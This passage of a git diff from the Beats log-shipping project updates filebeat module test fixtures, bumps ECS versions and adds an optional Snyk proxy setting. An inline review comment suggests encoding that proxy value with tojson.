"panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2706,6 +2730,7 @@ "panw.panos.sub_type": "deny", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -2811,6 +2836,7 @@ "panw.panos.source.zone": "trust", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -2917,6 +2943,7 @@ "panw.panos.sub_type": "test", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3026,6 +3053,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3138,6 +3166,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3247,6 +3276,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3356,6 +3386,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3465,6 +3496,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3574,6 +3606,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3684,6 +3717,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3796,6 +3830,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -3908,6 +3943,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -4017,6 +4053,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4126,6 +4163,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4238,6 +4276,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "insufficient-content", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4345,6 +4384,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "insufficient-content", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4457,6 +4497,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4566,6 +4607,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4678,6 +4720,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4790,6 +4833,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -4899,6 +4943,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5008,6 +5053,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -5120,6 +5166,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5229,6 +5276,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5336,6 +5384,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5441,6 +5490,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5550,6 +5600,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5659,6 +5710,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5768,6 +5820,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5877,6 +5930,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -5986,6 +6040,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6095,6 +6150,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -6204,6 +6260,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6313,6 +6370,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6422,6 +6480,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6531,6 +6590,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6640,6 +6700,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6749,6 +6810,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6858,6 +6920,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -6970,6 +7033,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7079,6 +7143,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7188,6 +7253,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -7297,6 +7363,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7406,6 +7473,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7515,6 +7583,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7627,6 +7696,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-info", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7736,6 +7806,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7845,6 +7916,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -7957,6 +8029,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8066,6 +8139,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8175,6 +8249,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8284,6 +8359,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -8393,6 +8469,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8501,6 +8578,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8609,6 +8687,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8717,6 +8796,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8827,6 +8907,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -8936,6 +9017,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9045,6 +9127,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9154,6 +9237,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9266,6 +9350,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9378,6 +9463,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -9490,6 +9576,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9599,6 +9686,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "web-advertisements", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9711,6 +9799,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9823,6 +9912,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -9935,6 +10025,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10047,6 +10138,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10159,6 +10251,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10268,6 +10361,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10377,6 +10471,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10486,6 +10581,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], 
@@ -10595,6 +10691,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10704,6 +10801,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10813,6 +10911,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], @@ -10922,6 +11021,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "PA-220" ], diff --git a/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml b/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml index 33545d1ac54..28da2bde50f 100644 --- a/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml +++ b/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/rabbitmq/log/config/log.yml b/x-pack/filebeat/module/rabbitmq/log/config/log.yml index 730ea5c04f3..7ad74c6d0c0 100644 --- a/x-pack/filebeat/module/rabbitmq/log/config/log.yml +++ b/x-pack/filebeat/module/rabbitmq/log/config/log.yml @@ -18,4 +18,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/radware/defensepro/config/input.yml b/x-pack/filebeat/module/radware/defensepro/config/input.yml index a2b133a9dc4..4de8cde78a3 100644 --- a/x-pack/filebeat/module/radware/defensepro/config/input.yml +++ b/x-pack/filebeat/module/radware/defensepro/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/snort/log/config/input.yml b/x-pack/filebeat/module/snort/log/config/input.yml index 17aab4adc03..f0ed0aaa1e7 100644 --- a/x-pack/filebeat/module/snort/log/config/input.yml +++ b/x-pack/filebeat/module/snort/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/snort/log/test/generated.log-expected.json b/x-pack/filebeat/module/snort/log/test/generated.log-expected.json index 2969320816f..78537722d68 100644 --- a/x-pack/filebeat/module/snort/log/test/generated.log-expected.json +++ b/x-pack/filebeat/module/snort/log/test/generated.log-expected.json @@ -335,8 +335,8 @@ "its7829.localhost" ], "related.ip": [ - "10.110.31.190", - "10.157.18.252" + "10.157.18.252", + "10.110.31.190" ], "rsa.crypto.sig_type": "rQu", "rsa.internal.messageid": "5979", @@ -886,8 +886,8 @@ "tper4341.lan" ], "related.ip": [ - "10.210.180.142", - "10.111.33.70" + "10.111.33.70", + "10.210.180.142" ], "rsa.internal.messageid": "NGIPS_events", "rsa.internal.msg_id": "animi", @@ -1009,8 +1009,8 @@ "unturmag6190.api.lan" ], "related.ip": [ - "10.238.223.171", - "10.52.190.18" + "10.52.190.18", + "10.238.223.171" ], "rsa.crypto.sig_type": "Finibus", "rsa.internal.messageid": "16539", @@ -1213,8 +1213,8 @@ "iqu4858.mail.invalid" ], "related.ip": [ - "10.213.100.153", - "10.116.175.84" + "10.116.175.84", + "10.213.100.153" ], "rsa.crypto.sig_type": "exercit", "rsa.internal.messageid": "11634", @@ -2234,10 +2234,10 @@ "Loremips5368.www5.corp" ], "related.ip": [ - "10.65.144.119", "10.166.40.137", + "10.20.167.114", "10.49.190.163", - "10.20.167.114" + "10.65.144.119" ], "rsa.internal.event_desc": "Offloaded TCP Flow for connection", "rsa.internal.messageid": "FTD_events", 
@@ -2537,8 +2537,8 @@ "ita7851.localhost" ], "related.ip": [ - "10.198.202.72", - "10.78.180.219" + "10.78.180.219", + "10.198.202.72" ], "rsa.internal.messageid": "MALWARE", "rsa.misc.checksum": "equaturv", @@ -2637,8 +2637,8 @@ "onse3711.api.domain" ], "related.ip": [ - "10.95.152.78", - "10.4.147.70" + "10.4.147.70", + "10.95.152.78" ], "rsa.crypto.sig_type": "cid", "rsa.internal.messageid": "9193", @@ -2790,8 +2790,8 @@ "essequ121.localdomain" ], "related.ip": [ - "10.216.14.36", - "10.224.250.83" + "10.224.250.83", + "10.216.14.36" ], "rsa.internal.messageid": "MALWARE", "rsa.misc.checksum": "emi", @@ -2891,8 +2891,8 @@ "Bonoru5658.mail.invalid" ], "related.ip": [ - "10.46.57.181", - "10.29.231.11" + "10.29.231.11", + "10.46.57.181" ], "rsa.internal.messageid": "NGIPS_events", "rsa.internal.msg_id": "remape", @@ -3420,8 +3420,8 @@ "onofdeFi1149.www5.domain" ], "related.ip": [ - "10.154.87.98", - "10.186.68.87" + "10.186.68.87", + "10.154.87.98" ], "rsa.internal.messageid": "NGIPS_events", "rsa.internal.msg_id": "uptate", @@ -3477,8 +3477,8 @@ "lumdol5252.internal.test" ], "related.ip": [ - "10.35.59.140", - "10.67.211.63" + "10.67.211.63", + "10.35.59.140" ], "rsa.internal.messageid": "NGIPS_events", "rsa.internal.msg_id": "itess", @@ -3658,8 +3658,8 @@ "cididu3187.home" ], "related.ip": [ - "10.14.46.141", - "10.179.27.185" + "10.179.27.185", + "10.14.46.141" ], "rsa.internal.messageid": "MALWARE", "rsa.misc.checksum": "llumdolo", @@ -3841,10 +3841,10 @@ "erunt3957.internal.lan" ], "related.ip": [ - "10.118.103.185", "10.32.195.34", - "10.125.130.61", - "10.240.77.10" + "10.118.103.185", + "10.240.77.10", + "10.125.130.61" ], "rsa.internal.event_desc": "TCP Flow is no longer offloaded for connection", "rsa.internal.messageid": "FTD_events", @@ -3888,8 +3888,8 @@ "ntNe7144.api.lan" ], "related.ip": [ - "10.111.130.177", - "10.188.88.133" + "10.188.88.133", + "10.111.130.177" ], "rsa.internal.messageid": "MALWARE", "rsa.misc.checksum": "numqu", 
diff --git a/x-pack/filebeat/module/snyk/audit/config/config.yml b/x-pack/filebeat/module/snyk/audit/config/config.yml index 73cd5423a02..9f0ae0c0d22 100644 --- a/x-pack/filebeat/module/snyk/audit/config/config.yml +++ b/x-pack/filebeat/module/snyk/audit/config/config.yml @@ -13,6 +13,9 @@ request.url: https://snyk.io/api/v1/org/{{.audit_id}}/audit?page=1&sortOrder=ASC {{ end }} request.method: POST request.ssl: {{ .ssl | tojson }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: header.Authorization @@ -73,4 +76,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/snyk/audit/manifest.yml b/x-pack/filebeat/module/snyk/audit/manifest.yml index eed5f4c29c9..b8858144bae 100644 --- a/x-pack/filebeat/module/snyk/audit/manifest.yml +++ b/x-pack/filebeat/module/snyk/audit/manifest.yml @@ -21,6 +21,7 @@ var: - name: event default: "" - name: ssl + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml b/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml index ca371361192..79cd03ed1d4 100644 --- a/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml +++ b/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml @@ -7,6 +7,9 @@ interval: {{ .interval }} request.url: {{ .url }} request.method: POST request.ssl: {{ .ssl | tojson }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: header.Authorization @@ -96,4 +99,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/snyk/vulnerabilities/manifest.yml b/x-pack/filebeat/module/snyk/vulnerabilities/manifest.yml index 391333380dc..771e52b972b 100644 --- a/x-pack/filebeat/module/snyk/vulnerabilities/manifest.yml +++ b/x-pack/filebeat/module/snyk/vulnerabilities/manifest.yml 
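Review bot: The added `request.proxy_url: {{ .proxy_url }}` in snyk/audit/config/config.yml renders the operator-supplied value into the YAML unquoted, while the neighbouring `request.ssl: {{ .ssl | tojson }}` line is encoded; the same line is added in snyk/vulnerabilities/config/config.yml. A value containing characters YAML treats specially (a ` #` sequence, a leading quote or brace, or `: ` inside embedded credentials) may be truncated or parsed as something other than the intended string. These requests carry the Snyk `Authorization` header, so the proxy setting should reach the input exactly as configured. I would write it as `request.proxy_url: {{ .proxy_url | tojson }}` in both templates. The surrounding `request.*` settings continue outside these hunks, so whether the input validates the URL scheme later cannot be confirmed from here.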
@@ -61,6 +61,7 @@ var: default: 0 - name: max_priority_score default: 1000 + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/sonicwall/firewall/config/input.yml b/x-pack/filebeat/module/sonicwall/firewall/config/input.yml index 6c6188a7022..2b7d20e77f4 100644 --- a/x-pack/filebeat/module/sonicwall/firewall/config/input.yml +++ b/x-pack/filebeat/module/sonicwall/firewall/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/sonicwall/firewall/test/generated.log-expected.json b/x-pack/filebeat/module/sonicwall/firewall/test/generated.log-expected.json index 4bb6b904241..584160ea68b 100644 --- a/x-pack/filebeat/module/sonicwall/firewall/test/generated.log-expected.json +++ b/x-pack/filebeat/module/sonicwall/firewall/test/generated.log-expected.json @@ -20,8 +20,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.20.234.169", - "10.208.15.216" + "10.208.15.216", + "10.20.234.169" ], "rsa.db.index": "ciade", "rsa.internal.messageid": "1197", @@ -60,12 +60,12 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.hosts": [ - "oreetdol1714.internal.corp", - "nostrud4819.mail.test" + "nostrud4819.mail.test", + "oreetdol1714.internal.corp" ], "related.ip": [ - "10.49.111.67", - "10.92.136.230" + "10.92.136.230", + "10.49.111.67" ], "rsa.internal.messageid": "914", "rsa.internal.msg": "lupt", @@ -126,9 +126,9 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.150.156.22", + "10.227.15.1", "10.149.203.46", - "10.227.15.1" + "10.150.156.22" ], "rsa.internal.event_desc": "ctetur", "rsa.internal.messageid": "1369", 
@@ -553,8 +553,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.157.161.103", - "10.78.151.178" + "10.78.151.178", + "10.157.161.103" ], "rsa.internal.event_desc": "taut", "rsa.internal.messageid": "24", @@ -620,8 +620,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.239.201.234", - "10.204.11.20" + "10.204.11.20", + "10.239.201.234" ], "rsa.internal.messageid": "87", "rsa.internal.msg": "Loremip", @@ -660,9 +660,9 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.34.161.166", + "10.219.116.137", "10.245.200.97", - "10.219.116.137" + "10.34.161.166" ], "rsa.internal.event_desc": "rehend", "rsa.internal.messageid": "428", @@ -705,8 +705,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.252.122.195", - "10.118.80.140" + "10.118.80.140", + "10.252.122.195" ], "rsa.internal.messageid": "401", "rsa.internal.msg": "inesci", @@ -827,8 +827,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.30.153.159", - "10.86.101.235" + "10.86.101.235", + "10.30.153.159" ], "rsa.identity.user_sid_dst": "nse", "rsa.internal.event_desc": "veniamqu", @@ -909,8 +909,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.162.172.28", - "10.237.163.139" + "10.237.163.139", + "10.162.172.28" ], "rsa.internal.messageid": "255", "rsa.internal.msg": "nre", @@ -997,8 +997,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.16.72.220", - "10.111.187.12" + "10.111.187.12", + "10.16.72.220" ], "related.user": [ "tenbyCi" @@ -1118,8 +1118,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.hosts": [ - "Nemoenim2039.api.localhost", - "sequatu341.mail.invalid" + "sequatu341.mail.invalid", + "Nemoenim2039.api.localhost" ], "related.ip": [ "10.77.129.130", 
@@ -1289,8 +1289,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.192.27.157", - "10.230.173.4" + "10.230.173.4", + "10.192.27.157" ], "rsa.internal.messageid": "140", "rsa.misc.action": [ @@ -1425,8 +1425,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.29.155.171", - "10.15.97.155" + "10.15.97.155", + "10.29.155.171" ], "rsa.internal.messageid": "616", "rsa.misc.action": [ @@ -1527,8 +1527,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.25.32.107", - "10.18.204.87" + "10.18.204.87", + "10.25.32.107" ], "related.user": [ "cteturad" @@ -1571,9 +1571,9 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.21.89.175", + "10.246.0.167", "10.71.238.250", - "10.246.0.167" + "10.21.89.175" ], "rsa.internal.event_desc": "elitse", "rsa.internal.messageid": "428", @@ -1620,8 +1620,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.13.66.97", - "10.176.209.227" + "10.176.209.227", + "10.13.66.97" ], "rsa.identity.user_sid_dst": "mex", "rsa.internal.event_desc": "upt", @@ -1679,8 +1679,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.77.174.205", - "10.240.49.224" + "10.240.49.224", + "10.77.174.205" ], "rsa.internal.messageid": "240", "rsa.internal.msg": "issuscip", @@ -1711,8 +1711,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.44.150.31", - "10.187.210.173" + "10.187.210.173", + "10.44.150.31" ], "rsa.internal.messageid": "255", "rsa.internal.msg": "quamnih", @@ -1750,9 +1750,9 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.251.248.228", "10.108.84.24", - "10.113.100.237" + "10.113.100.237", + 